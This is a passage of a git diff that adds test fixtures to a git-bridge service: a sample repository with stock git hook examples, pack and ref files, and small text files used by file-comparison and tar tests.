necessary, but + it makes it easier to keep your history simple. + + * Whenever you need to test or publish your changes to topic + branches, merge them into "next" branch. + +The script, being an example, hardcodes the publish branch name +to be "next", but it is trivial to make it configurable via +$GIT_DIR/config mechanism. + +With this workflow, you would want to know: + +(1) ... if a topic branch has ever been merged to "next". Young + topic branches can have stupid mistakes you would rather + clean up before publishing, and things that have not been + merged into other branches can be easily rebased without + affecting other people. But once it is published, you would + not want to rewind it. + +(2) ... if a topic branch has been fully merged to "master". + Then you can delete it. More importantly, you should not + build on top of it -- other people may already want to + change things related to the topic as patches against your + "master", so if you need further changes, it is better to + fork the topic (perhaps with the same name) afresh from the + tip of "master". + +Let's look at this example: + + o---o---o---o---o---o---o---o---o---o "next" + / / / / + / a---a---b A / / + / / / / + / / c---c---c---c B / + / / / \ / + / / / b---b C \ / + / / / / \ / + ---o---o---o---o---o---o---o---o---o---o---o "master" + + +A, B and C are topic branches. + + * A has one fix since it was merged up to "next". + + * B has finished. It has been fully merged up to "master" and "next", + and is ready to be deleted. + + * C has not merged to "next" at all. 
+ +We would want to allow C to be rebased, refuse A, and encourage +B to be deleted. + +To compute (1): + + git rev-list ^master ^topic next + git rev-list ^master next + + if these match, topic has not merged in next at all. + +To compute (2): + + git rev-list master..topic + + if this is empty, it is fully merged to "master". diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/prepare-commit-msg.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/prepare-commit-msg.sample new file mode 100755 index 0000000..f093a02 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/prepare-commit-msg.sample @@ -0,0 +1,36 @@ +#!/bin/sh +# +# An example hook script to prepare the commit log message. +# Called by "git commit" with the name of the file that has the +# commit message, followed by the description of the commit +# message's source. The hook's purpose is to edit the commit +# message file. If the hook fails with a non-zero status, +# the commit is aborted. +# +# To enable this hook, rename this file to "prepare-commit-msg". + +# This hook includes three examples. The first comments out the +# "Conflicts:" part of a merge commit. +# +# The second includes the output of "git diff --name-status -r" +# into the message, just before the "git status" output. It is +# commented because it doesn't cope with --amend or with squashed +# commits. +# +# The third example adds a Signed-off-by line to the message, that can +# still be edited. This is rarely a good idea. + +case "$2,$3" in + merge,) + /usr/bin/perl -i.bak -ne 's/^/# /, s/^# #/#/ if /^Conflicts/ .. /#/; print' "$1" ;; + +# ,|template,) +# /usr/bin/perl -i.bak -pe ' +# print "\n" . `git diff --cached --name-status -r` +# if /^#/ && $first++ == 0' "$1" ;; + + *) ;; +esac + +# SOB=$(git var GIT_AUTHOR_IDENT | sed -n 's/^\(.*>\).*$/Signed-off-by: \1/p') +# grep -qs "^$SOB" "$1" || echo "$SOB" >> "$1" diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/update.sample b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/update.sample new file mode 100755 index 0000000..80ba941 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/hooks/update.sample @@ -0,0 +1,128 @@ +#!/bin/sh +# +# An example hook script to block unannotated tags from entering. +# Called by "git receive-pack" with arguments: refname sha1-old sha1-new +# +# To enable this hook, rename this file to "update". +# +# Config +# ------ +# hooks.allowunannotated +# This boolean sets whether unannotated tags will be allowed into the +# repository. By default they won't be. +# hooks.allowdeletetag +# This boolean sets whether deleting tags will be allowed in the +# repository. By default they won't be. +# hooks.allowmodifytag +# This boolean sets whether a tag may be modified after creation. By default +# it won't be. +# hooks.allowdeletebranch +# This boolean sets whether deleting branches will be allowed in the +# repository. By default they won't be. +# hooks.denycreatebranch +# This boolean sets whether remotely creating branches will be denied +# in the repository. 
By default this is allowed. +# + +# --- Command line +refname="$1" +oldrev="$2" +newrev="$3" + +# --- Safety check +if [ -z "$GIT_DIR" ]; then + echo "Don't run this script from the command line." >&2 + echo " (if you want, you could supply GIT_DIR then run" >&2 + echo " $0 <ref> <oldrev> <newrev>)" >&2 + exit 1 +fi + +if [ -z "$refname" -o -z "$oldrev" -o -z "$newrev" ]; then + echo "usage: $0 <ref> <oldrev> <newrev>" >&2 + exit 1 +fi + +# --- Config +allowunannotated=$(git config --bool hooks.allowunannotated) +allowdeletebranch=$(git config --bool hooks.allowdeletebranch) +denycreatebranch=$(git config --bool hooks.denycreatebranch) +allowdeletetag=$(git config --bool hooks.allowdeletetag) +allowmodifytag=$(git config --bool hooks.allowmodifytag) + +# check for no description +projectdesc=$(sed -e '1q' "$GIT_DIR/description") +case "$projectdesc" in +"Unnamed repository"* | "") + echo "*** Project description file hasn't been set" >&2 + exit 1 + ;; +esac + +# --- Check types +# if $newrev is 0000...0000, it's a commit to delete a ref. +zero="0000000000000000000000000000000000000000" +if [ "$newrev" = "$zero" ]; then + newrev_type=delete +else + newrev_type=$(git cat-file -t $newrev) +fi + +case "$refname","$newrev_type" in + refs/tags/*,commit) + # un-annotated tag + short_refname=${refname##refs/tags/} + if [ "$allowunannotated" != "true" ]; then + echo "*** The un-annotated tag, $short_refname, is not allowed in this repository" >&2 + echo "*** Use 'git tag [ -a | -s ]' for tags you want to propagate." >&2 + exit 1 + fi + ;; + refs/tags/*,delete) + # delete tag + if [ "$allowdeletetag" != "true" ]; then + echo "*** Deleting a tag is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/tags/*,tag) + # annotated tag + if [ "$allowmodifytag" != "true" ] && git rev-parse $refname > /dev/null 2>&1 + then + echo "*** Tag '$refname' already exists." >&2 + echo "*** Modifying a tag is not allowed in this repository." >&2 + exit 1 + fi + ;; + refs/heads/*,commit) + # branch + if [ "$oldrev" = "$zero" -a "$denycreatebranch" = "true" ]; then + echo "*** Creating a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/heads/*,delete) + # delete branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + refs/remotes/*,commit) + # tracking branch + ;; + refs/remotes/*,delete) + # delete tracking branch + if [ "$allowdeletebranch" != "true" ]; then + echo "*** Deleting a tracking branch is not allowed in this repository" >&2 + exit 1 + fi + ;; + *) + # Anything else (is there anything else?) 
+ echo "*** Update hook: unknown type of update to ref $refname of type $newrev_type" >&2 + exit 1 + ;; +esac + +# --- Finished +exit 0 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/index b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/index new file mode 100644 index 0000000..ac6d4fd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/index differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/exclude b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/exclude new file mode 100644 index 0000000..a5196d1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/exclude @@ -0,0 +1,6 @@ +# git ls-files --others --exclude-from=.git/info/exclude +# Lines that start with '#' are comments. +# For a project mostly in C, the following would be a good set of +# exclude patterns (uncomment them if you want to use them): +# *.[oa] +# *~ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/refs new file mode 100644 index 0000000..9c9037a --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/info/refs @@ -0,0 +1 @@ +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/HEAD b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/HEAD new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/refs/heads/master b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/logs/refs/heads/master new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/info/packs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/info/packs new file mode 100644 index 0000000..bbfa012 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/info/packs @@ -0,0 +1,2 @@ +P pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack + diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx new file mode 100644 index 0000000..30d5e13 Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.idx differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack new file mode 100644 index 0000000..d28e3bd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/objects/pack/pack-71e0b18bc4675e30d48c891ae9bfc2487ec6e0bb.pack differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/packed-refs b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/packed-refs new file mode 100644 index 0000000..102f77f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/DOTgit/packed-refs @@ -0,0 +1,2 @@ +# pack-refs with: peeled fully-peeled +71ebe5d70c8634f7531cc09c1cad5dae951a9052 refs/heads/master diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/bridge/repo/GitProjectRepoTest/rootdir/without_incoming/file2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/neq1.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq1/neq1.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/file.txt new file mode 100644 
index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/neq2.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfFileNamesAreNotEqual/neq2/neq2.txt new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq1/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2/neq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseIfInnerDirectoryNamesAreNotEqual/neq2/neq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2/file.txt new file mode 100644 index 0000000..81c545e --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenFilesAreNotEqualInBothDirectories/neq2/file.txt @@ -0,0 +1 @@ +1234 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/dir/file.txt new file mode 100644 index 0000000..274c005 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/dir/file.txt @@ -0,0 +1 @@ +1234 \ No newline at end of 
file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsFalseWhenRecursiveFilesAreNotEqualInBothDirectories/neq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ 
b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueEvenIfGitDirectoriesAreNotEqual/eq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenFilesAreEqualInBothDirectories/eq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/dir/file.txt new file mode 100644 index 0000000..d800886 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq1/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/dir/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/dir/file.txt new file mode 100644 index 0000000..d800886 --- 
/dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/dir/file.txt @@ -0,0 +1 @@ +123 \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/file.txt b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/file.txt new file mode 100644 index 0000000..e56e15b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/snapshot/servermock/util/FileUtilTest/returnsTrueWhenRecursiveFilesAreEqualInBothDirectories/eq2/file.txt @@ -0,0 +1 @@ +12345 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/dir_with_empty_file/empty b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/dir_with_empty_file/empty new file mode 100644 index 0000000..e69de29 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file1 new file mode 100644 index 0000000..e212970 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file1 @@ -0,0 +1 @@ +file1 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file2 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file2 new file mode 100644 index 0000000..6c493ff --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/file2 @@ -0,0 +1 @@ +file2 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file1 new file mode 100644 index 0000000..5c441e6 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file1 @@ -0,0 +1 @@ +nest1/file1 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file2 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file2 new file mode 100644 index 0000000..2b7361b --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file2 @@ -0,0 +1 @@ +nest1file2 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file3 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file3 new file mode 100644 index 0000000..ac69189 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/file3 @@ -0,0 +1 @@ +nest1/file3 diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/nest2/file1 b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/nest2/file1 new file mode 100644 index 0000000..5e92e63 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/util/TarTest/testdir/nest1/nest2/file1 @@ -0,0 +1 @@ +nest1/nest2/file1 diff --git a/services/git-bridge/start.sh b/services/git-bridge/start.sh new file mode 100755 index 0000000..714eeba --- /dev/null +++ b/services/git-bridge/start.sh @@ -0,0 +1,15 
